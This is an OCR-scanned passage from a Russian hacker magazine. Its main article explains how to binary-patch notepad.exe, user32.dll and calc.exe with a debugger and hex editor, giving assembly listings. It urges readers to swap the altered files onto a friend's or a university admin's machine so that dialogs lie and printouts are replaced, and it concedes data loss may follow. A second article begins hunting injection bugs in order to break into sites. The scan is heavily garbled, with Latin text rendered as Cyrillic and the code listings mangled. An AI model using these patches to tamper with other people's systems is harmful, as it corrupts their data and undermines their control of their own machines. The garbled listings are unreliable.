ма. Одним из способов является покупка баннерных мест 
на раскрученных хак-порталах (достаточно эффективный 
способ рекламы). Но есть вариант попроще и поде- 
шевле— об менлинкамии баннера мис конкурентами и 
дружественными тимами. В любом случае, определенные 
материальные расходы придется понести. Как говорится, 
без денег денег не сделаешь :). 

Какбы там ни было, походу осуществления своих замыслов 
постоянно будут возникатьтраблы. Поэтому не рассчиты- 
вай на легкий и быстрый старт, а готовься к повседневному 
головняку. 

КОМАНДА И ЗАКОН 

Но вернемся с небес на землю и обратимся кУголовно- 
му кодексу. Ведь создание хак-тимы — не что иное, как 
создание ОПГ — организованной преступной группы. А 
это достаточно серьезное преступление, хотя и трудно- 
доказуемое. Настоятельно рекомендую ознакомиться со 
вторыми пунктами статей 272, 273, 159 (скорее всего, дея- 
тельность твоей команды будет связана именно с этими 
статьями). В них говорится об отягчающих обстоятельст- 
вах при со вершении уголовного правонарушения, в том 
числе и о совершении противоправных деяний группой 
лиц. Кстати, согласно Уголовному кодексу, группа лиц 
— это два и более человек :). Чтобы не быть голословным, 
процитирую вторую часть из 272-й статьи: «То же деяние, 
совершенное группой лиц по предварительному сговору 
или организованной группой л ибо лицом с использова- 
нием своего служебного положения, а равно имеющим 
доступ к ЭВМ, системе ЭВМ или их сети, наказывается 
штрафом в размере от пятисот до восьмисот минималь- 
ных размеров оплаты труда ил и в размере заработной 
платы или иного дохода осужденного за период от пяти 
до восьми месяцев либо исправительными работами на 
срок от одного года до двух лет либо арестом на срок от 
трехдо шести месяцев л ибо лишением свободы на срок 
до пяти лет». Аналогичное деяние одного человека нака- 
зывается максимум лишением свободы на срок до двух 
лет. Нескольких, какты заметил, — до пяти. Напрашива- 
ется фраза из известной рекламы: «А если нет разницы, 
зачем платить больше?» Понимаю, что юмор здесь 
неуместен, но это еще один повод задуматься. 

НАПУТСТВИЕ 

Надеюсь, что из моей статьи ты понял, насколько сложно 
организовать успешную команду, которая действительно 
была бы командой, а не сборищем любителей пива. Но 
хочется верить и в то, что ты не будешь нарушать закон, 
а воспримешь данную статью только как ознакомление с 
жизнью матерых преступников. Не забывай об Уголовном 
кодексе и не выбирай для себя и других людей криминаль- 
ную тропу. Поверь, приобрести друзей сложно, но намного 
проще их потерять. Удачи :) ц-ц 
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Конкурс 

ЖУРНАЛ ХАКЕР И КОМПАНИЯ КОѴЕК С0МР1ПЕК5 ОБЪЯВЛЯЮТ КОНКУРС 
С М ЕГА КРУТЫ М П РИ 30 М СМАРТФОНОМ КОѴЕКРС КБ =ЖМ5.0 «СТАНДАРТЫ 05М/ 
6РК5/Е00Е +ШТЕКЫЕТ + ІСО +Е-МАН. +МРЗ +МР64 

.ЧТОБЫ ЗАПОЛУЧИТЬОДИН ИЗ ТРЕХ ДЕВАЙСОВ, ПРИДЕТСЯ ПОСТАРАТЬСЯ. 

МЫ ПОДГОТОВИЛИ 3 ЗАДАНИЯ РАЗЛИЧНОЙ СЛОЖНОСТИ, ВЫПОЛНЕНИЕ КОТОРЫХ 
И ОПРЕДЕЛИТПОБЕДИТЕЛЯ. 




1) САМОВЫВОДЩАЯСЯ ПРОГРАММА. 



Напиши на языке С самую корот- 
кую программу, которая выведет 
собственный исходный код. 

2) ДОМОРОЩЕННАЯ КРИПТОГРАФИЯ. 

Расшифруй строку: ХА5ЧЕ0УРѴѴ 

3) ИЗУЧЕНИЕ ПРИЗА. 

Ответь на несложный 
вопрос: 

сколько макси- 
мально будет 
весить сделанная 
смартфоном Р5 
фотография? 



‘ОѴЕЙРС Кб - ПОВЫШАЕТ 

настроение 

И УСПЕВАЕМОСТЬ, 

?мдр *"■“*»* эдп-івд™ 

СМАРТФОН ЧСѴ*ЯР>С о с 

ЗАРЕГИСТРИРУЙСЯ 

НАіѴ№Ѵ.ЦОНге№РС.Іі(і 

ЛУЦІ^и™ "‘’ ИИ »Ч»ПП. 

КАНИКУЛЫ НД ЧАЛЬТЕ’ 



КоѵегРС 



ОТВЕТЫ ПРИСЫЛАЙ НА АДРЕС КОУЕКОКЕАЬ.ХАКЕР.КЦ. ЧЕМ ТОЧНЕЕ И ПОЛНЕЕ 
ТЫ ОТВЕТИШЬ НА ВОПРОСЫ, ТЕМ БОЛЬШЕ У ТЕБЯ ШАНСОВ ЗАПОЛУЧИТЬ ПРИЗ. 




» 



взлом 






ЛЕОНИД «СВ@ѴѴІ_ЕРІ» ИСУПОВ 

/ СПАѴѴІ_ЕКНАСК@ВАМВІ_ЕП.ПІІ / 



Спокойствие 
под прицелом 



Западлянки в стиле сгаск 




□ 





ПРИВЕТ, ДРУЖИЩЕ! НАВЕРНОЕ, У ТЕБЯ ЕСТЬМНОГО ЗАДУМ0КТ0Г0, КАКМОЖНО 
ПОВЕСЕЛИТЬ ДРУЗЕЙ. Я, ПРИЗНАЮСЬ, БОЛ ЬШОЙ ЛЮБИТЕЛЬ ПОДСТРОИТЬ ИМ ЗА- 
ПАДЛО - НЕВАЖНО, МАЛЕНЬКОЕ ИЛИ БОЛЬШОЕ. ЕСЛИ НЕ ПЕРЕУСЕРДСТВОВАТЬ, 
ТОТЫ МОЖЕШЬ ДАЖЕ ОСТАТЬСЯ БЕЗ СИНЯКА ПОД ГЛАЗОМ. ГЛАВНОЕ - ЗАШИФРО- 
ВАТЬСЯ, ЧТОБЫ НИКТО НИЧЕГО НЕ ЗАПОДОЗРИЛ. 



аш план таков: берем стандартные приложения и немного 
проходимся по ним напильничком, то есть отладчиком, редак- 
тором ресурсов, шестнадцатеричным редактором, после чего 
они начинают вытворять разные несообразности: ругаться 
матом, закрывать окна и вообще вести себя совсем не так, как должны :). 

Я долго думал над тем, что же такое сотворить, чтобы просто реализо- 
вывалось, максимально бесило, удивляло и смешило, и придумал-таки! 
Сначала займемся классикой, только не литературной, а крякерской. 
Будем учиться вставлять в программы окошки, которые выдают ржач- 
ные сообщения. Например, я хочу, чтобы при запуске измененного 
поіерасі.ехе мой друг получал сообщение: «Данная область памяти 
зарезервирована под нужды компании МісгозоІІ» :). Ничего идея, прав- 
да? Главное — не быть банальным и придумать что-то смешное. 

Итак, готовь поіерасі.ехе и другие стандартные приложения к «опера- 
ции», посмотрим, как можно над ним поглумиться. 

ДО ЧЕГО ДОКАТИЛСЯ МІСК050РТ :) 

Первым делом мы пропатчим поіерасі.ехе так, чтобы при каждой попытке 
сохранения файла он выдавал сообщение типа: «Боггу, Щіз бгіѵе із гезегѵесі 
Гог МісгозоГі; (с) сотрапу!». Реализовать это очень просто. Откроем блокнот 



под отладчиком и посмотрим, что можно сделать. Как известно, запись в 
файл производится при помощи функции ѴѴгііеРіІе из кегпе132. Для того 
чтобы внедрить вызов процедуры выдачи сообщения (МеззадеВохА) со 
всеми параметрами, нужно немало места. Поэтому я предлагаю наиболее 
«бескровный» метод. По идее, после процедуры записи файла должна про- 
изводиться очистка области памяти, в которой находились записываемые 
данные, при помощи функции ДосаІРгее. А перед этим ей передаются пара- 
метры через стек. Так вот, я предлагаю на место инструкций, передающих 
в стек эти самые параметры, внедрить переход на конец секции кода, куда 
мы поместим процедуру выдачи сообщения. И параметры при этом никуда 
не денутся! Мы сначала запихаем их в стек, затем просто восстановим 
инструкцией ризб, а после этого возвратимся обратно для выполнения 
ДосаІРгее! Мы же не варвары, чтобы резать функции, результатом чего 
будет разбазаривание памяти :)! Приобщайся к крякерской культуре! Итак, 
ставим точку останова на все функции ѴѴгііеРІІе. Кстати, если возникнут 
какие-то вопросы по поводу работы отладчика, я советую тебе посетить 
ѵѵѵѵѵѵ.ѵѵазт.ги — там имеется множество полезной документации на эту 
тему. Также рекомендую тебе почитать мои предыдущие статьи крякерс- 
кой направленности, например «Приближение к Дао». Теперь попробуем 
сохранить файл. Программа прервалась на функции ѴѴгііеРІІе (по адресу 
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ф Роіаѣіпд гоо! 

О РІеРогаІог 
в Ниде согпег 
О ѴѴаіііпд репеігаіог 
Ѳ Ноггіііс [ІазЬ 
О Епегду депегаіог 



01004С2А), после которой действительно идет І_осаІРгее. Запишем все инс- 
трукции, которые находятся между вызовами ѴѴгіІеРІІе и РосаІРгее: 

01004С32 РІІЗН [ЕВР-8] 

Могу сказать, что нам очень повезло. Безусловный переход требует 
5 байт — как раз столько памяти и занимают эти две инструкции! Смело 
заменяем их инструкцией перехода на конец секции кода: 

;Ітр 01008748 

Далее выполняем эту инструкцию и оказываемся по адресу 01008748, 
откуда мы и начинаем писать наш западлостроительный код. Мы не 
будем сохранять регистры, так как это не повлияет на работоспособ- 
ность программы, хотя хорошим тоном было бы сохранить и восстано- 
вить их при помощи, например, пары операций ризбаб/рораб. 

Итак, сначала положим в стек то, что находится по адресу [РВ Р-8] . Нас 
не интересует, что именно там хранится, мы просто забиваем в стек тот 
параметр для функции РосаІРгее, инструкцию передачи которого мы 
затерли командой перехода на наш код. Далее положим в стек пара- 
метры для функции МеззадеВохА. Вот ее прототип: 




ш код пишет в памятьуказатель на нашу строку 



іпб МеззадеВох( 

НШГО Шпб, // хэндл окна-предка 

ЬРСТЗТК. ІрТехР , / / адрес текста для окошка 

ЬРСТЗТК ІрСарСіоп, // адрес заголовка для окошка 

ШИТ иТуре / / стиль окошка 
) ? 

Ниже я привожу наш несложный код полностью. Читай описание, и все 
станет понятно. 

01008748 РІІЗН [ЕВР-8] ; инструкция, которая была 
ранее затерта 

0100874В РІІЗН 0; стиль окошка 
0100874Б РІІЗН 0; заголовок — по умолчанию 
0100874Е РІІЗН 01008762; указатель на текст окошка 
01008754 РІІЗН 0; окошко не имеет владельца 
01008756 САЬЬ МеззадеВохА; вызов МеззадеВохА 
0100875В МОѴ ЕЗІ , ЕАХ ; вторая потертая нами ранее 
инструкция 

0100875Б ЦМР 01004С34; передаем управление блокноту 
01008762 54 68 69 73 20; >АЗСІІ "ТМз бгіѵе із ге" 

01008772 73 65 72 76 65; >АЗСІІ "зегѵеб Тог Місго" 

01008782 73 6Е 66 74 20; >АЗСІІ "зоТТ (с) Сошрапу" 

Не забывай: стек работает по принципу РІРО, так что кладем параметры 

в обратном порядке. Сначала забиваем в стек байт-код стиля окошка. 
Пусть это будет нолик, то есть окошко будет содержать только одну 
кнопку — Ок. Второй параметр — тоже нолик, так как заголовок окна у 
нас будет по умолчанию — «Ошибка». Далее вводим адрес, по которому 
располагается текст. Давай сделаем так, чтобы текст находился сразу 
после нашего кода, начиная с адреса 01008762. Значит, вводим инс- 
трукцию ризИ 01008762. Последний параметр — также нолик (владельца 
или предка у окошка нет). Сразу после передачи параметров находится 
вызов МеззадеВох’а. После него следует команда, которую мы заме- 
нили переходом на наш код. Ну и, наконец, самая последняя операция 
— передача управления основной программе по адресу 01004С34, где 
располагается вызов функции РосаІРгее. Тебе осталось только забить 
выдаваемое сообщение, начиная с адреса 01008762. Теперь сохраняй 
файл под другим именем и заменяй стандартный поіераб.ехе на маши- 
не своего друга. Пусть он удивится наглости мелкомягких. 

Добавлю только, что строка должна заканчиваться ноликом. Мы его не про- 
писывали лишь потому, что после нашего кода и так одни сплошные нули. И 
еще: если ты будешь использовать метод в других случаях, не забудь вернуть 
все регистры в исходное состояние. Приведу пример: сначала я планировал 
сохранить регистры в стек, но забыл их забрать обратно, из-за этого при 
выполнении западлостроительного кода появлялся артефакт в виде окошка 
«Ошибка: Операция выполнена успешно» :). Так что будь аккуратен. 
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> ѵісіео 

На нашем 0Ѵ0 ты 
найдешь видео- 
ролик, в котором 
проиллюстрированы 
все описанные в ста- 
тье методы. Поэтому, 
если у тебя что-то не 
выходит, обратись к 
диску! 




> СІѴСІ 



На нашем ОѴй 
ты найдешь все 
программы, которые 
были созданы и 
использованы в 
процессе работы. 




ОПЕРАЦИЯ «ПОДМЕНА» 

Сейчас мы будем глумиться над твоим другом еще более 
изощренными методами. Мы сделаем так, чтобы при выво- 
де любого системного сообщения (МеввадеВох’а) текст 
окошка был нами сочиненным! Представь, друг удаляет 
файл, а ему вместо «Вы действительно хотите удалить 
этот файл?» выдается что-нибудь вроде «Неііо, ту Ыаск 
ЬгоіЬег!» :). 

Для претворения этого коварного плана в жизнь мы попро- 
буем изменить системную библиотеку ІІ5ег32.сІЦ. Внимание! 
Ни журнал «Хакер», ни автор не будут возмещать ущерб, 
если ты что-то сделаешь без установленного драйвера 
и прямых рук! Так что перед выполнением этого западла 
потренируйся у себя на компе, а когда будешь практиковать- 
ся, обязательно сохраняй оригинальную библиотеку! 

Итак, будем искать, где же располагается «нутро» АРІ - 
функции МеввадеВохА, с помощью отладки простого фай- 
лика ехатріе.ехе, написанного на ассемблере (мы над ним 
изгалялись в статье «Программная оборона», помнишь?). 
Загружай его в отладчик. Если этого файлика у тебя нет, 
не беда! Запускай любую другую программу, где присут- 
ствует вызов МеввадеВохА, и ставь точку останова на все 
саІГы. Загрузив программу под отладчиком, смело трасси- 
руй по <Р8>, пока не дойдешь до вызова нашей функции 
МеввадеВохА по адресу 00401 00Е. Теперь два раза нажи- 
май <Е7> для детальной трассировки. Ты тут же попадешь в 
системную библиотеку изег32.сИ1 по адресу 77070506. Адрес 
может быть и другим, все зависит от билда твоей ОС, но в 
данном случае это не играет никакой роли. Теперь трасси- 
руй по <Е8> вплоть до вызова: 

77В7054В САБЕ изег32 . МеззадеВохЕхА 

В эту функцию также заходи, чтобы посмотреть более под- 
робно (<Е7>). Итак, вот что мы видим, приземлившись в 
окрестностях адреса 77070570: 



77В70598 РОР ЕВР 
77В70599 КЕТЫ 14 
77В7059С ШР 
77В7059В ШР 

Здесь, как ты можешь догадаться, идет передача данных в 
стек, причем строка по адресу [ЕВР+С] — не что иное, как 
строка сообщения. Мы заменим ее своей. Как? Очень про- 
сто: в конце файла ивег32.сИ[ есть массив ноликов, туда мы 
строчку и пихнем. Она будет располагаться по адресу, ска- 
жем, 7708Е0А8. Итак, двигайся вниз и вписывай по этому 
адресу свою строку. 

Вернемся к нашему куску кода. Я не случайно включил в 
листинг два пор’а. Ведь вместо операции РІІ5Н ОѴѴОРО 
РТР 55ТЕВР+С] нам придется втавить операцию поме- 
щения в стек данных, располагающихся по конкретному 
адресу! Естественно, реальный адрес — это далеко не сме- 
щение относительно регистра, и он занимает больше места 
в памяти. В нашем случае нужно где-то раздобыть 2 байта 
для помещения по адресу 77070580 пятибайтной инст- 
рукции РІІ5Н 77б81 : сІа8. Тут-то на помощь нам и приходят 
два пор’а, которые ты видишь в самом конце листинга! Мы 
сдвинем код вниз на 2 байта и на освободившееся место 
поставим наш ризЬ. 

Итак, вырезай инструкции, начиная с адреса 77070590, и 
вставляй их по адресу 77070592. После этого меняй РІІ5Н 
ОѴѴОРО РТР 55ТЕВР+С] на РИЗН 77сШа8. Теперь, если 
ты выполнишь этот код, тебе придется начать все сначала, 
так что не спеши жать <Е9>! Объясню почему. Заметил 
команду геіп 14? Это команда возврата, но она работает не 
с абсолютными адресами, а со смещениями относительно 
текущего адреса. Мы сдвинули ее на 2 байта вниз. Теперь 
у нас есть два варианта: либо изменить адресный регистр, 
что попахивает извращением, либо поменять эту инструк- 
цию на геіп 12, что более адекватно. Поэтому меняй геіп 14 
на геіп 12. Теперь наш код должен выглядеть так: 



77Б7057Б 


МОѴ 


ЕБІ , ЕБІ 






77Б7057Б 


МОѴ 


ЕБІ , ЕБІ 




77Б7057Е 


РБЗН 


ЕВР 






77Б7057Е 


РБЗН 


ЕВР 




7 7 Б7 0580 


МОѴ 


ЕВР , ЕЗР 






77Б70580 


МОѴ 


ЕВР, ЕЗР 




77Б70582 


РБЗН 


-1 






77Б70582 


РБЗН 


-1 




77Б70584 


РБЗН 


БѴЮРВ 


РТР 


33 : [ЕВР+18 ] 


77Б70584 


РБЗН 


БѴЮРВ РТР 


33: [ЕВР+18] 


77Б70587 


РБЗН 


ВШРВ 


РТР 


33 : [ЕВР+14 ] 


77Б70587 


РБЗН 


ВШРВ РТР 


33: [ЕВР+14] 


77Б7058А 


РБЗН 


БѴЮРВ 


РТР 


33 : [ЕВР+10 ] 


77Б7058А 


РБЗН 


ВШРВ РТР 


33: [ЕВР+10] 


77Б7058Б 


РБЗН 


вдакв 


РТР 


33: [ЕВР+С] 


77Б7058Б 


РБЗН 


77Б8ЕБА8 




77Б70590 


РБЗН 


ВШРВ 


РТР 


33: [ЕВР+8 ] 


77Б70592 


РБЗН 


БѴЮРВ РТР 


33: [ЕВР+8] 


77Б70593 


САЕЬ 


изег32 


.МеззадеВохТішеоиБА 


77Б70595 


САББ 


изег32 . 77Б85ЕЕА 



► 070 
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|іп32| программы оперируют с формами! 



77Б7059А РОР ЕВР 
77Б7059В КЕТЫ 12 

Итак, теперь смело жми <Р9>! Все работает. Мы обманули программу с 
помощью фейковых данных АРІ-функции. Этот метод, конечно, годит- 
ся для западла, но будет слишком заметен при другом применении. 
Изменение системных библиотек при создании руткита, к приме- 
ру, — слишком опасный своей заметностью метод, хотя он нередко 
используется. Теперь сохраняй библиотеку под другим именем (метод 
сохранения из-под отладчика, я думаю, тебе известен, а если нет, то 
отсылаю тебя к туторам по ОНуйЬд и опять же к моим предыдущим ста- 
тьям). После этого заменяй стандартную изег32.сІЦ своей и радуйся, в 
то время как друг бесится, разыскивая висящие в памяти вредоносные 
процессы :). 

ВРЕМЯ МАТЕМАТИКИ 

Перейдем к более традиционным методам измывательства. Ты, навер- 
ное, знаешь, что ресурсы в программе часто хранятся в виде форм, а 
текстовые данные — вообще в открытом виде. Этим мы и воспользу- 
емся. Возьмем на прицел калькулятор и попробуем нарисовать на его 
кнопках веселые смайлы (ну и грустные тоже). Для этих целей задейс- 
твуем мой любимый уникальный шестнадцатеричный редактор ѴѴІпНех. 
Подойдет, конечно, и любой другой портируемый редактор, который 
можно принести к товарищу на флешке. 

Вот в чем заключается мой план: открываем саіс.ехе под редакто- 
ром, жмем <СМ-Е> для поиска и вводим в поле поиска надпись, 
находящуюся на кнопке, на которую мы хотим влепить смайл. Только 
тут следует учесть один момент: надписи, естественно, хранятся в 
юникоде, следовательно, в окне поиска ты должен это указать, иначе 
строчка просто не будет найдена. Итак, вводи, например, «5іп» и 
нажимай <Епіег>. Теперь заменяй ее смайлом, но имей в виду, что, 
так как мы работаем с юникодом, каждый символ закодирован двумя 
байтами, причем для букв английского алфавита второй байт будет 
нулевым. Например, строка «5іп» в побайтовом представлении будет 
выглядеть так: «53 00 69 00 6Е 00». Естественно, менять мы будем 
только ненулевые байты. Если мы захотим поменять «5іп» на смай- 
лик «:)», то третий символ (п) можно затереть пробелом. В таком 
случае побайтовое представление строки будет следующим: «Зй 00 
29 00 20 00». «20 00» — это код пробела в юникоде. 

Тут все предельно понятно, но нужно учесть и еще одну деталь. Надписи, 
располагающиеся на кнопках, могут дублироваться два или даже три раза, 
так как калькулятор работает в двух режимах: обычном и инженерном, 
а для каждого режима в программе предназначена своя форма. Так что 
найди все вхождения строки в файл и поменяй их на требуемый смайлик! 

С другими кнопками все делается аналогично! Все очень просто и 
эффективно. На диске ты можешь найти замечательный модифициро- 
ванный калькулятор. 



Вот поэтому я и запускаю 
все твои программы только 
под ѴМѵѵаге. 




НЕПОЛАДКИ В ПЕЧАТИ 

Сейчас мы попытаемся сделать одну очень любопытную вещь: мы пере- 
хватим управление у системы в то время, когда она будет передавать 
приложению данные для печати на принтер, и заменим эти самые дан- 
ные своими. Думаю, мы не будем разгребать спулинг и путаться с про- 
чими «системностями», а попробуем решить проблему на уровне кон- 
кретного приложения. Целью нашей будет тот же блокнот (ты можешь 
взять ѴѴогбРасІ или — чем черт не шутит — даже ѴѴогб). 

Итак, открываем отладчик, подгружаем поіерасі.ехе и начинаем грести. Я 
так думаю, что ни одно приложение не рискнет печатать текст, не зная 
его фактической ширины. Значит, берем в зубы любимые справоч- 
ники по АРІ (или лезем за помощью к МісгозоД) и обнаруживаем, что 
ширину текста запросто можно получить посредством использования 
ѲеіТехіЕхіепіРоіпі32ѴѴ. Это интересно! Ставим точку останова на все 
ее вызовы и копаем дальше. Теперь вводим в блокнотик любой текст и 
приказываем ему распечатать его. Перед самой печатью мы прервемся 
по адресу 010066Е8, где и происходит вызов: 

САББ ШОЕБ РТЕ БЗ: [<&СБІ32 . СеБТехБЕхБепБРоіпБ32М>] 

Это очень хорошо! Давай трассировать дальше, но по <Е8>, чтобы не 
затягивать процесс. Итак, после того как я 38 раз нажал <Е8>, я остано- 
вился там, где надо: 

01006СБЗ МОѴ ЕСХ,БѴЮЕБ РТЕ 33: [ЕВР-ЗЗС] 

Перейдем в окошке стека по адресу [ЕВР-ЗЗС]. Там и располагается 
указатель на наш текст ([еЬр-ЗЗс]=0006 Р4С4И) . Нам нужно знать, когда 
этот текст используется, чтобы вовремя его подменить. Можно, конечно, 
поставить точку останова на область памяти (по событию чтения ячей- 
ки), но даю гарантию, что в таком случае на нашу долю выпадет масса 
ложных срабатываний. Нам головная боль ни к чему, поэтому мы пойдем 
другим путем: поставим брейкпоинт на вызовы функции йгаѵѵТехіЕхѴѴ и 
опять попробуем начать печать. Ставим точку останова и запускаем про- 
цесс печати. Вот мы и вычислили вызов йгаѵѵТехіЕхѴѴ! Он выглядит так: 

01006С9С САЬЬ БѴГОЕБ РТЕ БЗ : [<&БЗЕЕ32 . БгамТехБЕхМ>] 

Итак, посмотрим на передаваемые параметры (набор инструкций ризЬ 
прямо перед вызовом самой функции). Нас среди них больше всего 
интересует вот эта строчка: 
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01006С8С РбЗН ШОІФ РТЕ 33: [ЕВР-ЗЗС] 

В [ЕВР-ЗЗС] располагается указатель на адрес, по которому находится 
текст, подлежащий печати! Мы можем поступить так: написать код, 
который прямо перед этим адресом разместит указатель на нашу строч- 
ку (а это будет строка «Пакер» :]]. Код должен вызываться, естественно, 
перед передачей параметров в ОгаѵѵТехіЕхѴѴ. Ты, конечно, спросишь, 
почему мы не стали производить замену указателя, который располага- 
ется по адресу [ЕВР-ЗЗС]. Казалось бы, реализовать это намного проще, 
чем помещать указатель по другому адресу, что сопряжено с измене- 
нием инструкции, кладущей в стек текстовую строку, с которой опери- 
рует функция ОгаѵѵТехіЕхА. С другой стороны, если какой-либо части 
программы потребуется этот указатель, а он окажется измененным, не 
избежать ошибок! Поэтому договоримся, что разместим его по адресу 
[ЕВР-340]. Из этого вытекает, что инструкцию по адресу 01006С8С нужно 
поменять на РІІ5Н [ЕВР-340]. Это мы делаем сразу, чтобы не забыть. 
Приступим, собственно, к написанию кода, отвечающего за поме- 
щение указателя на наш текст. К сожалению, у нас опять есть только 
один-единственный верный путь — поместить наши инструкции в 
массив ноликов, который располагается сразу после секции кода. 
Размещать наш код будем, начиная с адреса 01008748 (это уже 
своеобразная добрая традиция :]). Теперь нужно решить, откуда 
будет осуществляться переход на «жучок», написанный нами. Давай 
посмотрим на код, который располагается чуть выше, чем передача 
параметров для ОгаѵѵТехіЕхѴѴ: 

01006С69 ТЕЗТ ЕАХ , ЕАХ 

01006С6В ОЪЕ КЮТЕРАБ. 01006Б94 

Вот эти две инструкции мы и заменим операцией перехода на наш код. 
Записывай их на бумажку и смело меняй на ітр 01008748. Теперь дви- 
гайся к адресу 01008748, будем писать основную часть. Итак, вот что мы 
имеем: мы испортили две инструкции, начиная с адреса 01006С69, заме- 
нив их ітр. Теперь нам придется их выполнить в теле внедряемого кода 
(в самом конце, перед передачей управления обратно блокноту]. Более 
того, так как результат их верного выполнения зависит от значения реги- 
стра ЕАХ, придется сохранить его значение в стек еще до начала выпол- 
нения кода и восстановить после (то есть к нашему «жучку» добавляются 
две операции: ризЬ ЕАХ и рор ЕАХ]. Кроме того, сразу после нашего кода 
(например, по адресу 1008763) необходимо разместить строку, которая 
будет напечатана на принтере вместо текста пользователя. А указатель 
на нее мы разместим в памяти при помощи пары инструкций БЕА/МОѴ. 
Первая положит в регистр адрес, а вторая перенесет его в конкретную 



ячейку (в нашем случае это [ЕВР-340]). Итак, теперь посмотри, как 
выглядит готовый код, и тебе все станет понятно: 

01008748 РІІЗН ЕАХ; сохраняем регистр ЕАХ 

01008749 ЬЕА ЕАХ, [1008763] ; помещаем в ЕАХ указатель 

на нашу строку 

0100874Е МОѴ [ЕВР-340] ,ЕАХ; помещаем значение из ЕАХ 
по адресу [ЕВР-340] 

01008755 РОР ЕАХ; восстанавливаем регистр ЕАХ 

Далее включаем в код две операции, которые мы заменили ]тр: 

01008756 ТЕЗТ ЕАХ , ЕАХ 
01008758 ЦЬЕ 01006Б94 

И, наконец, передаем бразды правления приложению: 

0 10 0 87 5Е ЦМР 01006С71; передача управления 
блокноту 

Как видишь, команда БЕА ЕАХ, [1 008763] помещает в регистр ЕАХ физи- 
ческий адрес нашей строки. Надеюсь, ты уже догадался и разместил 
ее, начиная с адреса 1008763? Если нет, то скажу, что текст необходимо 
вводить в юникоде. ОЦуБЬд на это способна. Просто выделяешь тре- 
буемый блок данных, жмешь <СМ-Е> и в поле ІІпісосІе вводишь свою 
строку (я, как уже говорил, ввел «][акер» :))* Теперь сохраняй все изме- 
нения и запускай модифицированный поіерасі.ехе! И, если ты сделал 
все так, как я советовал, вместо набранного текста принтер упорно 
будет печатать нашу строку: «Какер»! Теперь дело за малым — неси 
файл ктоварищу или админу в универе :). 

УДАЧИ В ДЕЛАХ! 

Ну вот мы и освоили искусство низкоуровневой игры на нервах :)! 
Пришла пора закругляться. Я думаю, твои жертвы уже разобрали весь 
валидол в ближайших аптеках :]. Напоследок скажу, что у тебя есть 
два варианта на выбор: делать темные делишки на месте, пользуясь 
принесенным на флехе рогіаЫе-софтом, либо притаранить в гости 
уже готовый экзешник или сІ[[. Предложенные здесь идеи могут быть 
модифицированы по твоему усмотрению, стоит только подключить фан- 
тазию. Особенно неисчерпаема тема западла с применением патчинга 
АРІ. Да, и еще раз напомню: такие шутки чреваты потерями данных, 
так что будь осторожен, не лиши друга дипломной работы! Если у тебя 
есть какие-либо оригинальные идеи, пиши! Удачного западла =Б.ПЕ 
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с; КУЛЬТОВЫМ БРИТАНСКИМ ЖУРНАЛОМ ПД2ЕІК 




С СЕНТЯБРЯ 2<Х>7 ГОДА 



ЖУРНАЛ 



НАЧИНАЕТ СОТРУДІ ШЧЕСТВО 




Теперь б кладом номере 

ЫЕ ЛУЧШ III': 1 1 САМЫЕ СВЕЖИЕ 
МАТЕРИАЛЫ ИЛ 









двигатель 



^ ВЗЛОМ 



Невечный 



Ищем баги в экстремальных условиях! 



ЗДРАВСТВУЙ, МОЙ ЮНЫЙ ХАКЕР! БЫВАЛОЛИ СТОБОЙ КОГДА-НИБУДЬТАК, ЧТО 
НА САЙТЕ, КОТОРЫЙ ТЕБЕ ВО ЧТО БЫ ТО НИ СТАЛО НАДО БЫЛО СЛОМАТЬ, СТО- 
ЯЛ ПАТЧЕНЫЙ ПАБЛИК-ДВИЖОК? ДА? И ТЫ Н АВЕРНЯ КА СРАЗУ ЖЕ Л ЕЗ НА 
НТТР://00МАІЫ50В.МЕТ, НО, НЕ НАЙДЯ ТАМ НИКАКИХ ВАЖНЫХ СОСЕДЕЙ НУЖНОГО 
ТЕБЕ САЙТА, В ОТЧАЯНИИ ЗАБРАСЫВАЛ ЕГО. МНОГИЕ ТАК БЫ И СДЕЛАЛИ, НО МЫ 
ПОСТУПИМ ИНАЧЕ =). ПРЯМО ЗДЕСЬ И СЕЙЧАС Я НАУЧУ ТЕБЯ НЕХИТРОЙ РАБОТЕ 
БАГОИСКАТЕЛЯ =). ИТАК, ПОЕХАЛИ! 



ЗАПАСАЕМСЯ НЕОБХОДИМЫМ 

Какты, наверное, догадываешься, для взлома нужны определенные 
инструменты: 

О веб-сервер АрасЬе, БД МуЗОБ и интерпретатор РНР (в данном случае 
воспользуемся всем известным комплексом «все в одном» Бепѵѵег, 
ЫДрУ/сІепѵѵег.ги ): 

2) любой текстовый редактор с подсветкой синтаксиса РНР(личноя 
пользуюсь редактором ВРЕБ 3.0.3); 

3) утилита для поиска текста в файлах (встроенный поиск Винды не рулит, 



воспользуемся для этого прогой АѴЗеагсЬ) — на всякий случай. 

Установив все вышеперечисленные проги и купив необходимое количе- 
ство пива, ты можешьсоспокойной душой запускать Денвер и следовать 
за мной по пути взлома популярных РНР-движков =). 

ПЕРВАЯ ЖЕРТВА 

В качестве первого подопытного кролика я выбрал небезызвестный скриптзна- 
комствАеОабпд версии ѵ.4.0 (ссылку на скачивание давать не буду, поскольку этот 
софт платный, можешь поискать движок на бескрайних просторах инета). 
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Работа сплоита под аеБабпд 



Активация шелла в ѴѴогсІРгеББ 



После успешной инсталляции скрипта я перешел по адресу 
ШрУАосаІЬозі/сІаІе и увидел довольно симпатичную главную страницу 
датинга, что заставило меня немедленно полезть в его исходники в поис- 
кахуязвимости типа РН Р-і псіисіе. 

Итак, все файлы в папке абтіп/ при вызове требуют авторизации: 
$АБМШ = тетЪег_аикЫ ( 1 ) ; 

Поскольку по дефолту на взламываемом ресурсе у нас не будет прав ад- 
мина, такие файлы для изучения нам, естественно, не подойдут. Дальше, 
постепенно перебирая все файлы и папки, натыкаемся на папочку іпс/, 
где, открыв первый попавшийся файлик — абтіп.іпс.рЬр, видимтакую 
строчку: 

гедиіге_опсе ( " { $с!іг [ ' іпс ' ] }таСсЪ. . іпс .рЫр" ) ; 

Типичный РНР-инклуд. Описывать его я не буду, поскольку, как позже 
выяснилось, это была паблик-уязвимость, а нам надо найти свою и непо- 
вторимую. Теперь в поисках бага (уже 50І_-іпіесІіоп] логичнее всего было 
полазить из браузера по самому скрипту, чем я и занялся. Быстренько 
зарегавшись и войдя в свой профиль, я кликнул по первой попавшейся 
ссылке поиска юзеров для знакомства ( ЫірУЛосаІЬозі/сІаІе/зеагсЫрІір ) и 
увидел там множество полей, над которыми можно было вволю поизде- 
ваться =). Введя кавычку в поле «Поиск по Ю», я ничего не получил, а вот 
второе поле — «Поиск по нику» — отреагировало на мои извращения 
следующим образом: 

